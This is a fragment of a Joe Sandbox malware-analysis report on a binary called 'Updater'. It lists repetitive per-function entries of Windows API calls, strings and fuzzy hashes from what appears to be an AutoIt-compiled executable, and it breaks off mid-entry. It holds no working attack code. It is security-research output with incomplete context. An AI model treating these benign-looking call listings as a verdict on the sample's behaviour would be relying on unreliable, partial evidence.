InvalidateRect.USER32(00000000,?,00000000,00000001,?,0000000C,00000000,?,?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B84E00

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: MessageSend$InvalidateParentRectTimeout
String ID:
API String ID: 3648793173-0
Opcode ID: 6b16c93fd92a4cbf015ba678c5dd66360f393ed0f1c822b520ba7de1acc26a1b
Instruction ID: 5c107542ae66a67f6ec6210985a688fbfb647959ddec04060712db72bb2e7e59
Opcode Fuzzy Hash: 6b16c93fd92a4cbf015ba678c5dd66360f393ed0f1c822b520ba7de1acc26a1b
Instruction Fuzzy Hash: F3F06235200245FBEB345F56DC0DF977FACFB92B41F00425AB955860A0EAA68800DB60

Function 00BB924C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00B33B38: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B33B92
Part of subcall function 00B33B38: SelectObject.GDI32(?,00000000), ref: 00B33BA1
Part of subcall function 00B33B38: BeginPath.GDI32(?), ref: 00B33BB8
Part of subcall function 00B33B38: SelectObject.GDI32(?,00000000), ref: 00B33BE1

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00BB9270
LineTo.GDI32(?,?,?), ref: 00BB927D
EndPath.GDI32(?), ref: 00BB928D
StrokePath.GDI32(?), ref: 00BB929B

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 1cc284328eb4a6c7b4645e3fc88f7de9738c5d7e07950b23f51701a4b6eadc97
Instruction ID: 2ba52b5278795a23347f3a0bb48913951975351bbac9ba03ac94ccc147911b80
Opcode Fuzzy Hash: 1cc284328eb4a6c7b4645e3fc88f7de9738c5d7e07950b23f51701a4b6eadc97
Instruction Fuzzy Hash: 45F05E32042259BBDB126F54AC0AFDE3F99AF16321F44C141FA11630E18BF95511CFA6

Function 00B4105B Relevance: 6.0, APIs: 4, Instructions: 26timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00B4106D
GetCurrentThreadId.KERNEL32 ref: 00B4107C
GetCurrentProcessId.KERNEL32 ref: 00B41085
QueryPerformanceCounter.KERNEL32(?), ref: 00B41092

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: de113961c262b2eaeb6bf93d0cf6867acd075aa986da41d55cd8cd30bba6f63d
Instruction ID: 85930f8fc11daf60131f98867ea76bf5ee97d8e4794f167223bfece625d42a9c
Opcode Fuzzy Hash: de113961c262b2eaeb6bf93d0cf6867acd075aa986da41d55cd8cd30bba6f63d
Instruction Fuzzy Hash: 62F0AF70C1020CEBCB00DBF4D949A9EBBF8FF08301F514AA6E801E7110EB78AB049B55

Function 00B34A5F Relevance: 6.0, APIs: 4, Instructions: 24COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00B34A7B
SetTextColor.GDI32(?,?), ref: 00B34A85
SetBkMode.GDI32(?,00000001), ref: 00B34A98
GetStockObject.GDI32(00000005), ref: 00B34AA0

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 1c85161bc6bd1e9f48d9c90d5e322c50f1fda973be554ec2051e136dae08c965
Instruction ID: 83e23651a2225e468ee91314a37f37fa293f452f6cfe2ae861c9c3a9c9410f79
Opcode Fuzzy Hash: 1c85161bc6bd1e9f48d9c90d5e322c50f1fda973be554ec2051e136dae08c965
Instruction Fuzzy Hash: 83E06531684644AFDB205F78AC1DBD97B51EB11332F14C359FBB9550E0DBB205509B21

Function 00B8273F Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00B82748
OpenThreadToken.ADVAPI32(00000000,?,?,?,00B822E5), ref: 00B8274F
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00B822E5), ref: 00B8275C
OpenProcessToken.ADVAPI32(00000000,?,?,?,00B822E5), ref: 00B82763

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 73a908b5e85a37065d8acdfbb54ff34a4e705410bd30faf214e7a1c34063a645
Instruction ID: e7acfe27b56f9b8e984c130268e7303b892696df030e2ce28c58d419b03c9ccf
Opcode Fuzzy Hash: 73a908b5e85a37065d8acdfbb54ff34a4e705410bd30faf214e7a1c34063a645
Instruction Fuzzy Hash: DEE086356012119BD7203FB1DE0CB463BACDF447A5F144554B246CA094EABC8841C755

Function 00B656F9 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00B656F9
GetDC.USER32(00000000), ref: 00B65703
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B6570F
ReleaseDC.USER32(00000001), ref: 00B65730

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: eeea47fb9ef33a166a636e0654c9465a0321dc3bf6a577ea5cf3a6435d417c2d
Instruction ID: cb566800b6de5cc9e5c0ac3ffae3f69ee1a90632c0acefa38e042a9184541de0
Opcode Fuzzy Hash: eeea47fb9ef33a166a636e0654c9465a0321dc3bf6a577ea5cf3a6435d417c2d
Instruction Fuzzy Hash: 61E01AB5800604EFCB11AFA09808B5DBBF1EB4C321F118185E80EE3210EBB896419F00

Function 00B979DD Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 262COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B97A56
GetFileAttributesW.KERNEL32(?,00BBD934), ref: 00B97B2E

Part of subcall function 00B327CA: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00B3058E,?,00000001), ref: 00B327FC

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00B97A4A, 00B97A62

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: AttributesFileLibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3802351006-2806939583
Opcode ID: 8f52191c69eb46056d022b8a7618206ec0657d9558144a64981d057e4f2a879e
Instruction ID: 32c3edf8aeb307557e70d1e620e3f52d84749327933df43b4959c493f1bfda6d
Opcode Fuzzy Hash: 8f52191c69eb46056d022b8a7618206ec0657d9558144a64981d057e4f2a879e
Instruction Fuzzy Hash: 7AA15C311082129BCB14EF20D891AAEB7F1FF94704F0449B8F59A972A1DF34EE49CB52

Function 00B4E11D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00B4E1AD

Strings

pow, xrefs: 00B4E185, 00B4E1A2

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 1ea1938c96138cf26c3a2b75005d8d9bade5fc7f0b4a12a132e524b174b8747a
Instruction ID: 8373d06fb4e3f8a8439f0347ca234ae66e74dcd9afbc94978d157dd51f5992fd
Opcode Fuzzy Hash: 1ea1938c96138cf26c3a2b75005d8d9bade5fc7f0b4a12a132e524b174b8747a
Instruction Fuzzy Hash: E6518271B8C10196D7127714E95177A2BE4FB40B02F208DE8F8E6572E8DF35CE98AA46

Function 00B3F8E4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 172COMMON

Download Yara Rule

Strings

#, xrefs: 00B3F90E

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: fcb219fdaad092c90461fa3efc0d61084ea112d711518a3966d0f45ace1128fd
Instruction ID: 4e5fb5408b00337f7206d6a4474b4cd028778a43a602af53dba02c53cdfd0de3
Opcode Fuzzy Hash: fcb219fdaad092c90461fa3efc0d61084ea112d711518a3966d0f45ace1128fd
Instruction Fuzzy Hash: 5451D0319042479FDB159F68C491BBABBE1EF15310F2481F6ECA59B390D734AD42CB64

Function 00B2C9A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00B2C9B1
GlobalMemoryStatusEx.KERNEL32(?), ref: 00B2C9CA

Strings

@, xrefs: 00B2C9BE

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: c92928ca4b824a16ee0f23fd5cc8eda4498f1e10cdf59761cf0053fc1fca0f5e
Instruction ID: 3aaa363a127a31273e8694aab1766c3369d016aa4b51a9b66dc3eea4e8af88da
Opcode Fuzzy Hash: c92928ca4b824a16ee0f23fd5cc8eda4498f1e10cdf59761cf0053fc1fca0f5e
Instruction Fuzzy Hash: 0A514972519744ABD320AF50E886BAFBBF8FF84700F41889DF1D891195EF708529CB66

Function 00BA630A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?), ref: 00BA63A7
_wcslen.LIBCMT ref: 00BA63B2

Strings

CALLARGARRAY, xrefs: 00BA63AD, 00BA63BE

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: e283b97a8962b7e5ef7a31120ad3f40cda3dde4f3f6559110bf64888b1d5b977
Instruction ID: 877bc39ee2ecceba5358abb39a5f94dde737bbcbdd5a7e9be6f07754bb964e3c
Opcode Fuzzy Hash: e283b97a8962b7e5ef7a31120ad3f40cda3dde4f3f6559110bf64888b1d5b977
Instruction Fuzzy Hash: 3F419271E001159FCF10EF58C881ABEBBF0EF19714F4481A8E919AB391EB759D45CB90

Function 00BB4F02 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00BB4FEE
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BB5003

Strings

', xrefs: 00BB4F5D

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: e42c278ec5c42508b00865e53b7f705ea016999b040f437c217f780b5f496406
Instruction ID: 4369f88493aed0ddcd36eac175da52df4da1e1055794ae958563fec13ac435a4
Opcode Fuzzy Hash: e42c278ec5c42508b00865e53b7f705ea016999b040f437c217f780b5f496406
Instruction Fuzzy Hash: 23410974A0120A9FDB14CF69D880BFABBF5FF49300F1041A9E909AB352D7B1A951CF90

Function 00BB40A6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00B34570: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B345AE
Part of subcall function 00B34570: GetStockObject.GDI32(00000011), ref: 00B345C2
Part of subcall function 00B34570: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B345CC

GetWindowRect.USER32(00000000,?), ref: 00BB4110
GetSysColor.USER32(00000012), ref: 00BB412A

Strings

static, xrefs: 00BB40ED

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 95f054c122aab8a768ff193021e9987605badf82e952f0be316e892a23d7028c
Instruction ID: 7e0a52d932f16e74e6791307a3afc3f70835a66533db1a8f9d06c7d93e0036b5
Opcode Fuzzy Hash: 95f054c122aab8a768ff193021e9987605badf82e952f0be316e892a23d7028c
Instruction Fuzzy Hash: 4F21FC72910209AFDB00DFA8CC45AFA7BF8FB18314F014555FD55E3151E775E8519B50

Function 00B9D82F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B9D88E
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B9D8B7

Strings

<local>, xrefs: 00B9D877

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 3a0d199fa4179e5dfbed957d634732d16fc349a3353586584da5732bfaf9ac12
Instruction ID: e6d7c067aef7f4a3e5abc8ea93aea3b3466429a8f65a4ec3f213b3b4fd803d0a
Opcode Fuzzy Hash: 3a0d199fa4179e5dfbed957d634732d16fc349a3353586584da5732bfaf9ac12
Instruction Fuzzy Hash: 6011A071655235BADB284B678CC9FF3BFACEF127A0F0042AAB51983181DA645940D6F0

Function 00B82E06 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45

Part of subcall function 00B84D36: GetClassNameW.USER32(?,?,000000FF), ref: 00B84D59

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B82E74

Strings

ListBox, xrefs: 00B82E3E
ComboBox, xrefs: 00B82E13

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 0fc570f346edb1c1aa61536a0066a96efb4653db9fb5ef96055c4b38df49f54d
Instruction ID: 9832f9c13a4528251f0085a9c7003d61b3d34be922ad1386152e684ce2395d17
Opcode Fuzzy Hash: 0fc570f346edb1c1aa61536a0066a96efb4653db9fb5ef96055c4b38df49f54d
Instruction Fuzzy Hash: 4001B575A4112AAB8B14FBA4CC558FE77F9EF56360B000AA9B866573E1EB315808C760

Function 00B82CFE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45

Part of subcall function 00B84D36: GetClassNameW.USER32(?,?,000000FF), ref: 00B84D59

SendMessageW.USER32(?,00000180,00000000,?), ref: 00B82D6C

Strings

ListBox, xrefs: 00B82D36
ComboBox, xrefs: 00B82D0B

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 3d4e92e22ba6d2a566e530421ea5f4582a853209d87492ffbf1679403de3234a
Instruction ID: f5725336a8822b3137ef8d70991714c954dd5ad2938d741acbda65c7470c5624
Opcode Fuzzy Hash: 3d4e92e22ba6d2a566e530421ea5f4582a853209d87492ffbf1679403de3234a
Instruction Fuzzy Hash: F501F775A4110AABCB14F7A0C956AFE7BF9DF16340F1001B57806632A1EB245E08C3B1

Function 00B82D83 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45

Part of subcall function 00B84D36: GetClassNameW.USER32(?,?,000000FF), ref: 00B84D59

SendMessageW.USER32(?,00000182,?,00000000), ref: 00B82DEF

Strings

ListBox, xrefs: 00B82DBB
ComboBox, xrefs: 00B82D90

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 52a8d969794ed85de57a757b7f9c5ebcb50316772b19382c8ddabccd25e13c4f
Instruction ID: 355082b67ec70801ad7482e132683691632e52914821a2a5890e9ef1da50feaa
Opcode Fuzzy Hash: 52a8d969794ed85de57a757b7f9c5ebcb50316772b19382c8ddabccd25e13c4f
Instruction Fuzzy Hash: A701D1B5A4111A6BCF10FBA4C956AFEBBFDDB16340F1005B5BC06732A2EA254E08D371

Function 00B658A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B658C1
_wcslen.LIBCMT ref: 00B658FF

Strings

3, 3, 15, 1, xrefs: 00B658AA

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 15, 1
API String ID: 176396367-2815819253
Opcode ID: 6ba9016614c30bc4172d0c90f2c53f6d2602c1d0655ef550afdac5feaead6829
Instruction ID: 4df6ae7379f5100fbc92961bc8a23c17970bcb4fabe1f3c61094c8148ffe9e02
Opcode Fuzzy Hash: 6ba9016614c30bc4172d0c90f2c53f6d2602c1d0655ef550afdac5feaead6829
Instruction Fuzzy Hash: 8FF0C21990169895EBB09A61DDC9B7D23E4BF88700F2084E9E809C3150FB648EA5EB40

Function 00B41311 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

